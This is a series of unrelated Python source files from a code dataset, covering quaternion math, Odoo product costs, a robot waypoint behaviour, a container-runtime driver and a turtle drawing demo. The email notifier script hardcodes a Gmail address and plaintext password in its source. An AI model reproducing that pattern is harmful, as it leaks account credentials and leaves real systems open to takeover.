final_plots_names]","sub_path":"src/quality_control.py","file_name":"quality_control.py","file_ext":"py","file_size_in_byte":8954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"388292231","text":"# helper functions for treating float lists as quaternions\n# author: maxime.tournier@inria.fr\n\nimport sys\n\nimport math\nfrom numpy import *\nimport numpy.linalg\n\ndef id():\n \"\"\"identity\"\"\"\n return array([0, 0, 0, 1])\n\ndef conj(q):\n \"\"\"conjugate\"\"\"\n return array([-q[0], -q[1], -q[2], q[3]])\n\ndef inv(q):\n \"\"\"\n inverse \n\n If you're dealing with unit quaternions, use conj instead.\n \"\"\"\n return conj(q) / numpy.linalg.norm(q)**2\n\ndef re(q):\n \"\"\"real part\"\"\"\n return q[3]\n\ndef im(q):\n \"\"\"imaginary part\"\"\"\n return array(q[:3])\n\ndef angle(q):\n \"\"\"get angle in rad\"\"\"\n return 2.0* math.acos(re(q))\n\n# TODO optimize\ndef prod(a, b):\n \"\"\" use this product to compose the rotations represented by two quaterions \"\"\" \n \"\"\"here is a readable version : array([ qa[3]*qb[0] + qb[3]*qa[0] + qa[1]*qb[2] - qa[2]*qb[1],qa[3]*qb[1] + qb[3]*qa[1] + qa[2]*qb[0] - qa[0]*qb[2], qa[3]*qb[2] + qb[3]*qa[2] + qa[0]*qb[1] - qa[1]*qb[0], qa[3]*qb[3] - qb[0]*qa[0] - qa[1]*qb[1] - qa[2]*qb[2] ])\"\"\"\n return hstack( (re(a)*im(b) + re(b)*im(a) + numpy.cross( im(a), im(b) ), [re(a) * re(b) - dot( im(a), im(b))] ))\n\n# TODO optimize\ndef rotate(q, x):\n \"\"\"vector rotation\n\n rotates x by the rotation represented by q. this is also the\n adjoint map for S^3.\n\n \"\"\"\n \n # TODO assert q is unit\n return im( prod(q, prod( hstack((array(x), [0])), conj(q))) )\n\n\ndef exp(v):\n \"\"\"exponential\n Return the quaternion corresponding to the given rotation vector\n \"\"\"\n theta = numpy.linalg.norm(v)\n\n if math.fabs(theta) < sys.float_info.epsilon:\n return id()\n\n s = math.sin(theta / 2)\n c = math.cos(theta / 2)\n\n return [ v[0] / theta * s,\n v[1] / theta * s,\n v[2] / theta * s,\n c ]\n\n\ndef rotVecToQuat(v):\n \"\"\" same as exp(v) \"\"\"\n return exp(v)\n\n\n\ndef flip(q):\n \"\"\"Flip a quaternion to the real positive hemisphere if needed.\"\"\"\n \n if re(q) < 0:\n return -1*q\n else :\n return q\n\n \ndef log(q):\n \"\"\"(principal) logarithm. \n Return rotation vector corresponding to unit quaternion q\n \"\"\"\n [ axis, angle ] = quatToAxis(q)\n return angle * axis\n\n\ndef quatToRotVec(q):\n \"\"\" same as log(q) \"\"\"\n return log(q)\n\ndef normalized(q):\n ## returning the normalized quaternion (without checking for a null norm...)\n return q / numpy.linalg.norm(q)\n\n\ndef from_matrix(M, isprecise=False):\n \"\"\"Return quaternion from rotation matrix.\n If isprecise is True, the input matrix is assumed to be a precise rotation\n matrix and a faster algorithm is used.\n \"\"\"\n\n if isprecise:\n q = numpy.empty((4, ))\n t = numpy.trace(M)\n if t > M[3, 3]:\n q[0] = t\n q[3] = M[1, 0] - M[0, 1]\n q[2] = M[0, 2] - M[2, 0]\n q[1] = M[2, 1] - M[1, 2]\n else:\n i, j, k = 1, 2, 3\n if M[1, 1] > M[0, 0]:\n i, j, k = 2, 3, 1\n if M[2, 2] > M[i, i]:\n i, j, k = 3, 1, 2\n t = M[i, i] - (M[j, j] + M[k, k]) + M[3, 3]\n q[i] = t\n q[j] = M[i, j] + M[j, i]\n q[k] = M[k, i] + M[i, k]\n q[3] = M[k, j] - M[j, k]\n q *= 0.5 / math.sqrt(t * M[3, 3])\n else:\n m00 = M[0, 0]\n m01 = M[0, 1]\n m02 = M[0, 2]\n m10 = M[1, 0]\n m11 = M[1, 1]\n m12 = M[1, 2]\n m20 = M[2, 0]\n m21 = M[2, 1]\n m22 = M[2, 2]\n # symmetric matrix K\n K = numpy.array([[m00-m11-m22, 0.0, 0.0, 0.0],\n [m01+m10, m11-m00-m22, 0.0, 0.0],\n [m02+m20, m12+m21, m22-m00-m11, 0.0],\n [m21-m12, m02-m20, m10-m01, m00+m11+m22]])\n K /= 3.0\n # quaternion is eigenvector of K that corresponds to largest eigenvalue\n w, V = numpy.linalg.eigh(K)\n q = V[[3, 0, 1, 2], numpy.argmax(w)]\n\n if q[0] < 0.0:\n numpy.negative(q, q)\n\n #return q.tolist()\n return [ q[1], q[2], q[3], q[0] ] # sofa order\n\n\ndef to_matrix(quat):\n \"\"\"Convert a quaternion into rotation matrix form.\n\n @param quat: The quaternion.\n @type quat: numpy 4D, rank-1 array\n \"\"\"\n\n # Repetitive calculations.\n q4_2 = quat[3]**2\n q12 = quat[0] * quat[1]\n q13 = quat[0] * quat[2]\n q14 = quat[0] * quat[3]\n q23 = quat[1] * quat[2]\n q24 = quat[1] * quat[3]\n q34 = quat[2] * quat[3]\n\n matrix = numpy.empty((3,3))\n\n # The diagonal.\n matrix[0, 0] = 2.0 * (quat[0]**2 + q4_2) - 1.0\n matrix[1, 1] = 2.0 * (quat[1]**2 + q4_2) - 1.0\n matrix[2, 2] = 2.0 * (quat[2]**2 + q4_2) - 1.0\n\n # Off-diagonal.\n matrix[0, 1] = 2.0 * (q12 - q34)\n matrix[0, 2] = 2.0 * (q13 + q24)\n matrix[1, 2] = 2.0 * (q23 - q14)\n\n matrix[1, 0] = 2.0 * (q12 + q34)\n matrix[2, 0] = 2.0 * (q13 - q24)\n matrix[2, 1] = 2.0 * (q23 + q14)\n\n return matrix\n\ndef from_line(v, sign=1, xyz=1):\n \"\"\"\n Compute a quaternion from a line\n @param v: director vector describing the line which will be used to compute the quaternion\n @type v: list\n @param sign: to change the sign of the vector director v\n @type sign: 1 / -1\n @param xyz: to indicate if v is the axis x (xyz=1), y (xyz=2) or z (xyz=3) of the matrix corresponding to the output quaternion\n @type xyz: int with the value 1/2/3\n \"\"\"\n v1 = numpy.array(v) / numpy.linalg.norm(numpy.array(v), 2) * sign;\n # v2 : orthogonal vector in z=0 plane\n if v1[0]==0 and v1[1]==0:\n v2 = [1,0,0]\n else:\n v2 = numpy.array([v1[1], -v1[0], 0]) / numpy.linalg.norm(numpy.array([v1[1], -v1[0], 0]), 2);\n v3 = numpy.cross(v1, v2)\n if(xyz==1) :\n m = numpy.matrix([ [v1[0], v2[0], v3[0]], [v1[1], v2[1], v3[1]], [v1[2], v2[2], v3[2]] ])\n if(xyz==2) :\n m = numpy.matrix([ [v2[0], v1[0], v3[0]], [v2[1], v1[1], v3[1]], [v2[2], v1[2], v3[2]] ])\n if(xyz>=3) :\n m = numpy.matrix([ [v2[0], v3[0], v1[0]], [v2[1], v3[1], v1[1]], [v2[2], v3[2], v1[2]] ])\n q = from_matrix(m)\n return q\n\n\ndef axisToQuat(axis, phi):\n \"\"\" return the quaternion corresponding to rotation around vector axis with angle phi\n \"\"\"\n axis_norm = numpy.linalg.norm(axis)\n if axis_norm < sys.float_info.epsilon:\n return id()\n axis = axis / axis_norm\n return [ axis[0]*math.sin(phi/2),\n axis[1]*math.sin(phi/2),\n axis[2]*math.sin(phi/2),\n math.cos(phi/2) ]\n\ndef quatToAxis(q):\n \"\"\" Return rotation vector corresponding to unit quaternion q in the form of [axis, angle]\n \"\"\"\n q2 = flip(q) # flip q first to ensure that angle is in the [-0, pi] range\n\n half_angle = math.acos( min(re(q2), 1.0) )\n\n if half_angle > sys.float_info.epsilon:\n return [ im(q2) / math.sin(half_angle), 2 * half_angle ]\n\n norm = numpy.linalg.norm( im(q2) )\n if norm > sys.float_info.epsilon:\n sign = 1.0 if half_angle > 0 else -1.0\n return [ im(q2) * (sign / norm), 2 * half_angle ]\n\n return [ numpy.zeros(3), 2 * half_angle ]\n\ndef slerp(q1,q2,t):\n \"\"\" Return spherical linear interpolation between q1 qnd q2\n \"\"\"\n return prod( q1, exp( t*log(prod(conj(q1),q2)) ) )\n\n\n\n\ndef quatToRodrigues(q):\n \"\"\" Return rotation vector corresponding to unit quaternion q in the form of angle*axis\n \"\"\"\n return quatToRotVec(q)\n\n\n#def from_euler_xyz( a ):\n# ## a is a list of 3 euler angles [x,y,z]\n# q = numpy.empty((4, ))\n# q[3] = cos(a[0]/2.0)*cos(a[1]/2.0)*cos(a[2]/2.0) + sin(a[0]/2.0)*sin(a[1]/2.0)*sin(a[2]/2.0);\n# q[0] = sin(a[0]/2.0)*cos(a[1]/2.0)*cos(a[2]/2.0) - cos(a[0]/2.0)*sin(a[1]/2.0)*sin(a[2]/2.0);\n# q[1] = cos(a[0]/2.0)*sin(a[1]/2.0)*cos(a[2]/2.0) + sin(a[0]/2.0)*cos(a[1]/2.0)*sin(a[2]/2.0);\n# q[2] = cos(a[0]/2.0)*cos(a[1]/2.0)*sin(a[2]/2.0) - sin(a[0]/2.0)*sin(a[1]/2.0)*cos(a[2]/2.0);\n# return q\n\n#def to_euler_xyz(q):\n\n# norm = q[0]*q[0]+q[1]+q[1]+q[2]+q[2]\n\n# if math.fabs( norm ) > 1e-8 :\n# normq = norm + q[3]*q[3]\n# q /= math.sqrt(normq)\n# angle = math.acos(q[3]) * 2\n# return q[:3] / norm * angle\n# else :\n# return [0,0,0]\n\n# q = normalized(q)\n# angle = math.acos(q[3]) * 2;\n# v = q[:3]\n# norm = numpy.linalg.norm( v )\n# if norm > 0.0005:\n# v /= norm\n# v *= angle\n# return v\n\n\n##### adapted from http://www.lfd.uci.edu/~gohlke/code/transformations.py.html\n\n# epsilon for testing whether a number is close to zero\n_EPS = numpy.finfo(float).eps * 4.0\n\n# axis sequences for Euler angles\n_NEXT_AXIS = [1, 2, 0, 1]\n\n# map axes strings to/from tuples of inner axis, parity, repetition, frame\n_AXES2TUPLE = {\n 'sxyz': (0, 0, 0, 0), 'sxyx': (0, 0, 1, 0), 'sxzy': (0, 1, 0, 0),\n 'sxzx': (0, 1, 1, 0), 'syzx': (1, 0, 0, 0), 'syzy': (1, 0, 1, 0),\n 'syxz': (1, 1, 0, 0), 'syxy': (1, 1, 1, 0), 'szxy': (2, 0, 0, 0),\n 'szxz': (2, 0, 1, 0), 'szyx': (2, 1, 0, 0), 'szyz': (2, 1, 1, 0),\n 'rzyx': (0, 0, 0, 1), 'rxyx': (0, 0, 1, 1), 'ryzx': (0, 1, 0, 1),\n 'rxzx': (0, 1, 1, 1), 'rxzy': (1, 0, 0, 1), 'ryzy': (1, 0, 1, 1),\n 'rzxy': (1, 1, 0, 1), 'ryxy': (1, 1, 1, 1), 'ryxz': (2, 0, 0, 1),\n 'rzxz': (2, 0, 1, 1), 'rxyz': (2, 1, 0, 1), 'rzyz': (2, 1, 1, 1)}\n\n_TUPLE2AXES = dict((v, k) for k, v in _AXES2TUPLE.items())\n\n\n\ndef euler_from_matrix(M, axes='sxyz'):\n \"\"\"Return Euler angles from rotation matrix for specified axis sequence.\n @warning returns a numpy array\n\n axes : One of 24 axis sequences as string or encoded tuple\n\n Note that many Euler angle triplets can describe one matrix.\n\n >>> R0 = euler_matrix(1, 2, 3, 'syxz')\n >>> al, be, ga = euler_from_matrix(R0, 'syxz')\n >>> R1 = euler_matrix(al, be, ga, 'syxz')\n >>> numpy.allclose(R0, R1)\n True\n >>> angles = (4*math.pi) * (numpy.random.random(3) - 0.5)\n >>> for axes in _AXES2TUPLE.keys():\n ... R0 = euler_matrix(axes=axes, *angles)\n ... R1 = euler_matrix(axes=axes, *euler_from_matrix(R0, axes))\n ... if not numpy.allclose(R0, R1): print(axes, \"failed\")\n\n \"\"\"\n try:\n firstaxis, parity, repetition, frame = _AXES2TUPLE[axes.lower()]\n except (AttributeError, KeyError):\n _TUPLE2AXES[axes] # validation\n firstaxis, parity, repetition, frame = axes\n\n i = firstaxis\n j = _NEXT_AXIS[i+parity]\n k = _NEXT_AXIS[i-parity+1]\n\n# M = numpy.array(matrix, dtype=numpy.float64, copy=False)[:3, :3]\n a = numpy.empty((3, ))\n\n if repetition:\n sy = math.sqrt(M[i, j]*M[i, j] + M[i, k]*M[i, k])\n if sy > _EPS:\n a[0] = math.atan2( M[i, j], M[i, k])\n a[1] = math.atan2( sy, M[i, i])\n a[2] = math.atan2( M[j, i], -M[k, i])\n else:\n a[0] = math.atan2(-M[j, k], M[j, j])\n a[1] = math.atan2( sy, M[i, i])\n a[2] = 0.0\n else:\n cy = math.sqrt(M[i, i]*M[i, i] + M[j, i]*M[j, i])\n if cy > _EPS:\n a[0] = math.atan2( M[k, j], M[k, k])\n a[1] = math.atan2(-M[k, i], cy)\n a[2] = math.atan2( M[j, i], M[i, i])\n else:\n a[0] = math.atan2(-M[j, k], M[j, j])\n a[1] = math.atan2(-M[k, i], cy)\n a[2] = 0.0\n\n if parity:\n a[0], a[1], a[2] = -a[0], -a[1], -a[2]\n if frame:\n a[0], a[2] = a[2], a[0]\n return a\n\ndef to_euler(q, axes='sxyz'):\n \"\"\"Return Euler angles from quaternion for specified axis sequence.\n @warning returns a numpy array\n \"\"\"\n return euler_from_matrix( to_matrix(q), axes )\n\n\ndef from_euler( a, axes='sxyz' ):\n \"\"\"Return quaternion from Euler angles and axis sequence.\n @warning returns a numpy array\n\n a is a list of 3 euler angles [x,y,z]\n axes : One of 24 axis sequences as string or encoded tuple\n\n >>> q = quaternion_from_euler(1, 2, 3, 'ryxz')\n >>> numpy.allclose(q, [0.435953, 0.310622, -0.718287, 0.444435])\n True\n\n \"\"\"\n try:\n firstaxis, parity, repetition, frame = _AXES2TUPLE[axes.lower()]\n except (AttributeError, KeyError):\n _TUPLE2AXES[axes] # validation\n firstaxis, parity, repetition, frame = axes\n\n i = firstaxis\n j = _NEXT_AXIS[i+parity]\n k = _NEXT_AXIS[i-parity+1]\n\n if frame:\n a[0], a[2] = a[2], a[0]\n if parity:\n a[1] = -a[1]\n\n a[0] /= 2.0\n a[1] /= 2.0\n a[2] /= 2.0\n ci = math.cos(a[0])\n si = math.sin(a[0])\n cj = math.cos(a[1])\n sj = math.sin(a[1])\n ck = math.cos(a[2])\n sk = math.sin(a[2])\n cc = ci*ck\n cs = ci*sk\n sc = si*ck\n ss = si*sk\n\n q = numpy.empty((4, ))\n if repetition:\n q[3] = cj*(cc - ss)\n q[i] = cj*(cs + sc)\n q[j] = sj*(cc + ss)\n q[k] = sj*(cs - sc)\n else:\n q[3] = cj*cc + sj*ss\n q[i] = cj*sc - sj*cs\n q[j] = cj*ss + sj*cc\n q[k] = cj*cs - sj*sc\n if parity:\n q[j] *= -1.0\n\n return q\n","sub_path":"dependencies/numerics/Quaternion.py","file_name":"Quaternion.py","file_ext":"py","file_size_in_byte":12872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"428989797","text":"# -*- coding: utf-8 -*-\n# Part of Odoo. See LICENSE file for full copyright and licensing details.\nfrom odoo.addons import decimal_precision as dp\nfrom odoo import models, fields, api\n\nclass ProductTemplate(models.Model):\n _inherit = \"product.template\"\n\n @api.model\n def _default_currency(self):\n return self.env.user.company_id.currency_id\n\n dnk_cost_mp = fields.Float(\n string=\"- Cost Materials\",\n compute='_compute_cost',\n inverse='_set_cost',\n digits=dp.get_precision('Product Price'), groups=\"base.group_user\")\n\n dnk_cost_mo = fields.Float(\n string=\"- Cost Labor\",\n inverse='_set_cost',\n digits=dp.get_precision('Product Price'), groups=\"base.group_user\")\n\n dnk_cost_gif = fields.Float(\n string=\"- GIF Cost\",\n inverse='_set_cost',\n digits=dp.get_precision('Product Price'), groups=\"base.group_user\")\n\n dnk_costs_currency_id = fields.Many2one('res.currency', string='- MP Cost Currency', default=_default_currency)\n\n dnk_product_cost_ids = fields.One2many('dnk.product.costs', 'dnk_product_tmpl_id', string=\"- Denker Costs (USD)\")\n\n\n @api.one\n def _set_cost(self):\n if len(self.product_variant_ids) == 1:\n self.product_variant_ids.dnk_cost_mp = self.dnk_cost_mp\n\n\n @api.depends('product_variant_ids', 'product_variant_ids.standard_price')\n def _compute_cost(self):\n unique_variants = self.filtered(lambda template: len(template.product_variant_ids) == 1)\n\n for template in unique_variants:\n template.dnk_costs_currency_id = template.product_variant_ids.dnk_costs_currency_id\n template.dnk_cost_mp = template.product_variant_ids.dnk_cost_mp\n for template in (self - unique_variants):\n template.dnk_cost_mp = 0.0\n if template.product_variant_ids:\n template.dnk_costs_currency_id = template.product_variant_ids[0].dnk_costs_currency_id\n\n\nclass ProductProduct(models.Model):\n _inherit = \"product.product\"\n\n dnk_cost_mp = fields.Float(\n string=\"- MP Cost\",\n company_dependent=True,\n digits=dp.get_precision('Product Price'), groups=\"base.group_user\")\n dnk_cost_mo = fields.Float(\n string=\"- MO Cost\",\n company_dependent=True,\n digits=dp.get_precision('Product Price'), groups=\"base.group_user\")\n dnk_cost_gif = fields.Float(\n string=\"- GIF Cost\",\n company_dependent=True,\n digits=dp.get_precision('Product Price'), groups=\"base.group_user\")\n\n dnk_costs_currency_id = fields.Many2one('res.currency', string='- MP Cost Currency', related='product_tmpl_id.dnk_costs_currency_id')\n\n dnk_product_cost_ids = fields.One2many('dnk.product.costs', 'dnk_product_id', string=\"- Denker Costs (USD)\")\n","sub_path":"denker/dnk_sale_costs/models/product.py","file_name":"product.py","file_ext":"py","file_size_in_byte":2779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"349966602","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n# Python packages\nfrom math import pi\n\n# ROS packages\nimport py_trees\nfrom geometry_msgs.msg import Point, Pose2D\n\n# Our packages\nimport ar_utils.action as action\n\n\nclass GenerateNextPose(py_trees.behaviour.Behaviour):\n \"\"\"\n Generate a new goal pose and make available the corresponding position and\n orientation has two separate keys. We could just make that pose avalable\n as a single variable, if Move2Pose accepted Pose2D (or Pose) goals, but it\n is left as it is to provide a richer example.\n \"\"\"\n def __init__(self, name, pos_key: str, angle_key: str):\n super(GenerateNextPose, self).__init__(name)\n self.pos_key = pos_key\n self.angle_key = angle_key\n\n # Waypoints list\n self.waypoints = [Pose2D(x=2.0, y=3.0, theta=pi),\n Pose2D(x=-3.0, y=-2.0, theta=pi/2.0)]\n self.curr_waypoint = -1\n\n def setup(self, **kwargs):\n \"\"\" Get blackboard client and register for the relevant keys \"\"\"\n self.logger.debug(\"{}.setup()\".format(self.qualified_name))\n # Store the node. You can use it for any ROS-related functionality\n try:\n self.node = kwargs['node']\n except KeyError as e:\n error_message = \"didn't find 'node' in setup's kwargs \" + \\\n \"[{}][{}]\".format(self.qualified_name,\n self.__class__.__name__)\n raise KeyError(error_message) from e # 'direct cause' traceability\n # Not get setup the blackboard keys acess\n self.blackboard = py_trees.blackboard.Client()\n self.blackboard.register_key(key=self.pos_key,\n access=py_trees.common.Access.WRITE)\n self.blackboard.register_key(key=self.angle_key,\n access=py_trees.common.Access.WRITE)\n self.logger.debug(\" %s [GenerateNextPose::setup()]\" % self.name)\n\n def initialise(self):\n \"\"\" Nothing special to do \"\"\"\n self.logger.debug(\" %s [GenerateNextPose::initialise()]\" % self.name)\n\n def update(self):\n \"\"\"\n Read the goal_pose from the blackboard and store the position and\n orientation\n \"\"\"\n self.logger.debug(\" %s [GenerateNextPose::update()]\" % self.name)\n\n # This behavior will always be successfull. But if it that was not the\n # case, it would return failure\n # self.feedback_message = \"Some failure message!\"\n # return py_trees.common.Status.FAILURE\n\n # If the behavior could be unning for a while, we would have to return\n # py_trees.common.Status.RUNNING, and not block its execution.\n\n # In this example we just need to create the position and orientation\n # keys corresponding to the next desired pose.\n self.curr_waypoint = (self.curr_waypoint + 1) % len(self.waypoints)\n self.blackboard.set(self.pos_key,\n action.Move2Pos.Goal(target_position=Point(\n x=self.waypoints[self.curr_waypoint].x,\n y=self.waypoints[self.curr_waypoint].y,\n z=0.0)))\n self.blackboard.set(\n self.angle_key,\n action.Rotate2Angle.Goal(\n target_orientation=self.waypoints[self.curr_waypoint].theta))\n self.feedback_message = \"New position and orientation generated!\"\n return py_trees.common.Status.SUCCESS\n\n def terminate(self, new_status):\n \"\"\"\n When is this called?\n Whenever your behaviour switches to a non-running state.\n - SUCCESS || FAILURE : your behaviour's work cycle has finished\n - INVALID : a higher priority branch has interrupted, or shutting\n down\n \"\"\"\n self.logger.debug(f\" {self.name} [GenerateNextPose::terminate().\" +\n f\"terminate()]{self.status}->{new_status}]\")\n","sub_path":"src/tw11/tw11/behaviors.py","file_name":"behaviors.py","file_ext":"py","file_size_in_byte":4003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"156008640","text":"# -*- coding: utf-8 -*-\nfrom materials.sia262 import SIA262_limit_state_checking\n\nexecfile('../env_config.py')\n\n#Reinforced concrete sections on each element.\nreinfConcreteSections= RC_material_distribution.loadRCMaterialDistribution()\n\nlimitStateLabel= lsd.fatigueResistance.label\nlsd.fatigueResistance.controller= SIA262_limit_state_checking.FatigueController(limitStateLabel)\nmeanFCs= lsd.fatigueResistance.check(reinfConcreteSections)\n\n\n","sub_path":"workingModel/calculations/verif_fatigueULS.py","file_name":"verif_fatigueULS.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"472539412","text":"#Module: EmailNotify\n#Implements email notifications for emergency notification.\n'''\n\nSMTP\nraspberrypi.julianpineiro@gmail.com\n'''\nimport os\nimport smtplib\nfrom os.path import basename\nfrom email.mime.application import MIMEApplication\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nfrom email.utils import COMMASPACE, formatdate\n\n#SMTP Configuration\nsent_from = 'raspberry.julianpineiro@gmail.com'\nto = 'julipineiro@gmail.com'\nsubject = 'Raspberry Pi Notification'\nbody = ''\nmsg = MIMEMultipart()\nmsg['Subject'] = subject\nmsg['From'] = sent_from\nmsg['To'] = to\n\n#Send email function.\ndef notify(body_text):\n text = MIMEText(body_text)\n msg.attach(text)\n try: \n server = smtplib.SMTP_SSL('smtp.gmail.com')\n server.ehlo()\n #print(\"Trying to log in...\")\n server.login('raspberry.julianpineiro@gmail.com', 'raspberrypass')\n #print(\"Logged in sucessufully!\")\n #print(\"Sending...\")\n server.sendmail(sent_from, to, msg.as_string())\n server.close()\n #print ('Email sent!')\n \n except: \n print ('Check Internet Connection... Something went wrong! :(')\n\n","sub_path":"Notify.py","file_name":"Notify.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"88947378","text":"\"\"\"Charliecloud driver as the container runtime system for tasks.\n\nCreates text for tasks using Charliecloud.\n\"\"\"\n\nimport os\nimport yaml\nfrom beeflow.common.crt.crt_driver import (ContainerRuntimeDriver, ContainerRuntimeResult,\n Command, CommandType)\nfrom beeflow.common.config_driver import BeeConfig as bc\nfrom beeflow.common.build.build_driver import task2arg\nfrom beeflow.common.container_path import convert_path\nfrom beeflow.common import log as bee_logging\n\n\nlog = bee_logging.setup(__name__)\n\n\nclass CharliecloudDriver(ContainerRuntimeDriver):\n \"\"\"The ContainerRuntimeDriver for Charliecloud as container runtime system.\n\n Creates the text for the task for using Charliecloud.\n \"\"\"\n\n def __init__(self):\n \"\"\"Create CharliecloudDriver object.\"\"\"\n # Retrieve Charlicloud options from configuration file.\n self.chrun_opts = bc.get('charliecloud', 'chrun_opts')\n self.cc_setup = bc.get('charliecloud', 'setup')\n # Read container archive path from config.\n container_archive = bc.get('builder', 'container_archive')\n self.container_archive = bc.resolve_path(container_archive)\n\n @staticmethod\n def get_ccname(image_path):\n \"\"\"Strip directories & .tar, .tar.gz, tar.xz, or .tgz from image path.\"\"\"\n name = os.path.basename(image_path).rsplit('.', 2)\n if name[-1] in ['gz', 'xz']:\n name.pop()\n if name[-1] in ['tar', 'tgz']:\n name.pop()\n name = '.'.join(name)\n return name\n\n def run_text(self, task): # noqa\n \"\"\"Create text for Charliecloud batch script.\"\"\"\n os.makedirs(self.container_archive, exist_ok=True)\n log.info(f'Build container archive directory is: {self.container_archive}')\n\n use_container = None\n task_container_name = task.get_requirement('DockerRequirement', 'beeflow:containerName')\n bind_mounts = task.get_requirement('DockerRequirement', 'beeflow:bindMounts')\n bind_mounts = (yaml.load(bind_mounts, Loader=yaml.SafeLoader)\n if bind_mounts is not None else {})\n\n baremetal = False\n if task_container_name is None:\n baremetal = True\n log.info('No beeflow:containerName provided.')\n runtime_target_list = []\n # Harvest beeflow:copyContainer if it exists.\n task_container_path = task.get_requirement('DockerRequirement',\n 'beeflow:copyContainer')\n if task_container_path:\n task_container_path = os.path.basename(task_container_path).split('.')[0]\n runtime_target_list.append(task_container_path)\n\n # Harvest dockerPull if it exists\n task_addr = task.get_requirement('DockerRequirement', 'dockerPull')\n if task_addr:\n task_container_path = task_addr.replace('/', '%')\n runtime_target_list.append(task_container_path)\n log.info(f'Found dockerPull path {task_container_path}. Using its container name.')\n if len(runtime_target_list) > 1:\n raise RuntimeError(\n 'Too many container runtimes specified! Pick one per workflow step.'\n )\n if len(runtime_target_list) == 0:\n log.warning('No beeflow:containerName specified.')\n else:\n baremetal = False\n # Build container name from container path.\n task_container_name = runtime_target_list[0]\n log.info(f'Moving w/expectation: {task_container_name} is the container target.')\n\n # Check for `beeflow:useContainer`\n use_container = task.get_requirement('DockerRequirement', 'beeflow:useContainer')\n if use_container:\n log.info(f'Found beeflow:useContainer option. Using container {use_container}')\n baremetal = False\n\n # Set the workdir with the env code\n task_workdir_env = f'cd {task.workdir}\\n' if task.workdir is not None else ''\n\n if baremetal:\n return ContainerRuntimeResult(env_code=task_workdir_env, pre_commands=[],\n main_command=Command([str(arg) for arg in task.command]),\n post_commands=[])\n\n if task_container_name:\n container_path = '/'.join([self.container_archive, task_container_name]) + '.tar.gz'\n\n # If use_container is specified, no copying is done, the file path is used\n if use_container:\n task_container_name = self.get_ccname(use_container)\n container_path = os.path.expanduser(use_container)\n else:\n container_path = '/'.join([self.container_archive, task_container_name]) + '.tar.gz'\n\n log.info(f'Expecting container at {container_path}. Ready to deploy and run.')\n\n deployed_image_root = bc.get('builder', 'deployed_image_root')\n\n hints = dict(task.hints)\n # --join is only supported with Slurm (maybe this logic shouldn't be in here)\n if bc.get('DEFAULT', 'workload_scheduler') == 'Slurm':\n mpi_opt = '--join' if 'beeflow:MPIRequirement' in hints else ''\n else:\n mpi_opt = ''\n command = ' '.join(task.command)\n env_code = '\\n'.join([self.cc_setup if self.cc_setup else '', task_workdir_env])\n deployed_path = deployed_image_root + '/' + task_container_name\n pre_commands = [\n Command(f'mkdir -p {deployed_image_root}\\n'.split(), CommandType.ONE_PER_NODE),\n Command(f'ch-convert -i tar -o dir {container_path} {deployed_path}\\n'.split(),\n CommandType.ONE_PER_NODE),\n ]\n # Need to convert the path from inside to outside base on the bind mounts\n extra_opts = ''\n if task.workdir is not None:\n # Only setting it for $HOME right now\n bind_mounts = {\n # Charliecloud bindmounts $HOME to /home/$USER by default\n os.getenv('HOME'): os.path.join('/home', os.getenv('USER')),\n }\n ctr_workdir_path = convert_path(task.workdir, bind_mounts)\n extra_opts = f'--cd {ctr_workdir_path}'\n bind_mount_opts = ' '.join(f'-b {path_a}:{path_b}'\n for path_a, path_b in bind_mounts.items())\n main_command = (f'ch-run {mpi_opt} {deployed_path} {self.chrun_opts} '\n f'{extra_opts} {bind_mount_opts} -- {command}\\n').split()\n main_command = Command(main_command)\n post_commands = [\n Command(f'rm -rf {deployed_path}\\n'.split(), type_=CommandType.ONE_PER_NODE),\n ]\n return ContainerRuntimeResult(env_code, pre_commands, main_command, post_commands)\n\n def build_text(self, userconfig, task):\n \"\"\"Build text for Charliecloud batch script.\"\"\"\n task_args = task2arg(task)\n text = (f'beeflow --build {userconfig} {task_args}\\n')\n return text\n","sub_path":"beeflow/common/crt/charliecloud_driver.py","file_name":"charliecloud_driver.py","file_ext":"py","file_size_in_byte":7091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"632124347","text":"from turtle import Turtle, Screen\nimport random\n\ndef ChangeWindowColor(color = 'white'):\n window = Screen()\n window.bgcolor(color)\n\ndef DrawLines(turtles = 8, ang = 360, colors = ['blue', 'red', 'orange', 'black'], shapes = ['classic', 'circle', 'turtle', 'triangle'], draw = True, stamp = True):\n pens = [] #Pens list\n shapeCount = 0\n for _ in range(0,turtles): #Create pen objects\n if shapeCount >= len(shapes): ##Iterate through shapes and make sure not to go above the max length of the shapes list\n shapeCount = 0\n pens.append(Turtle(visible=False, shape=shapes[shapeCount])) ##Create pen\n shapeCount += 1 #Increase shape counter by 1\n \n moveBy = ang/turtles\n count = 0\n colorCount = 0\n for pen in pens: #Move pen objects\n if not draw:\n pen.penup()\n\n ##Set color of pen\n if colorCount >= len(colors):\n colorCount = 0\n pen.color(colors[colorCount])\n colorCount += 1\n\n ##Move pen\n pen.left(moveBy*count)\n pen.forward(100)\n \n if stamp: ##Show or hide pen before moving it forward\n pen.stamp()\n\n count += 1\n\nChangeWindowColor('yellow')\nDrawLines(turtles=16, colors=['pink', 'purple', 'red', 'blue', 'orange', 'magenta'], draw=False)\ninput()","sub_path":"An Hour of Python!/DeepTurtle.py","file_name":"DeepTurtle.py","file_ext":"py","file_size_in_byte":1313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"179140821","text":"import os.path\nimport torchvision.transforms as transforms\nfrom data.base_dataset import BaseDataset, get_transform\nfrom data.image_folder import make_dataset\nfrom PIL import Image\nimport PIL\nfrom pdb import set_trace as st\nimport random\nfrom skimage import io, color\nimport numpy\n\n\nclass UnalignedDataset(BaseDataset):\n def initialize(self, 